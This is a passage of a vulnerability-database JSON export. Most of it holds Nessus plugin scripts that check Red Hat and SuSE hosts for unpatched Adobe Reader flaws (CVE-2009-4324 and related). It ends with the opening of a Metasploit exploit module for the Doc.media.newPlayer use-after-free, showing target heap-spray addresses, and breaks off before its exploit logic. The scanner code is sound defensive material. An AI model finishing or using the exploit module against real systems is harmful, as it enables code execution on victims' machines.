attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0038.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:45", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD_JA-6805.NASL", "href": "https://www.tenable.com/plugins/nessus/51711", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51711);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6805.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:43", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD-6803.NASL", "href": "https://www.tenable.com/plugins/nessus/51696", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51696);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:43", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD-6802.NASL", "href": "https://www.tenable.com/plugins/nessus/51695", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51695);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-9.3-0.5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:45", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD_JA-6804.NASL", "href": "https://www.tenable.com/plugins/nessus/51710", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51710);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6804.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:06:32", "bulletinFamily": "exploit", "description": "Adobe Doc.media.newPlayer Use After Free Vulnerability. CVE-2009-4324. Local exploit for windows platform", "modified": "2010-09-25T00:00:00", "published": "2010-09-25T00:00:00", "id": "EDB-ID:16623", "href": "https://www.exploit-db.com/exploits/16623/", "type": "exploitdb", "title": "Adobe Doc.media.newPlayer Use After Free Vulnerability", "sourceData": "##\r\n# $Id: adobe_media_newplayer.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\r\n\t\t\t\tProfessional versions up to and including 9.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'unknown', # Found in the wild\r\n\t\t\t\t\t# Metasploit version by:\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'pusscat',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4324' ],\r\n\t\t\t\t\t[ 'BID', '37331' ],\r\n\t\t\t\t\t[ 'OSVDB', '60980' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops'\t => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 6.0.1 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.0.5 - untested\r\n\t\t\t\t\t# reader 7.0.8 - untested\r\n\t\t\t\t\t# reader 7.0.9 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.1.0 - untested\r\n\t\t\t\t\t# reader 7.1.1 - untested\r\n\t\t\t\t\t# reader 8.0.0 - untested\r\n\t\t\t\t\t# reader 8.1.1 - works\r\n\t\t\t\t\t# reader 8.1.2 - untested\r\n\t\t\t\t\t# reader 8.1.3 - untested\r\n\t\t\t\t\t# reader 8.1.4 - untested\r\n\t\t\t\t\t# reader 8.1.5 - untested\r\n\t\t\t\t\t# reader 8.1.6 - untested\r\n\t\t\t\t\t# reader 9.0.0 - untested\r\n\t\t\t\t\t# reader 9.1.0 - works\r\n\t\t\t\t\t# reader 9.2 - works (no debugger, no DEP)\r\n\t\t\t\t\t[ 'Adobe Reader Windows English (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Adobe Reader Windows German (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0a0a0a0a,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 14 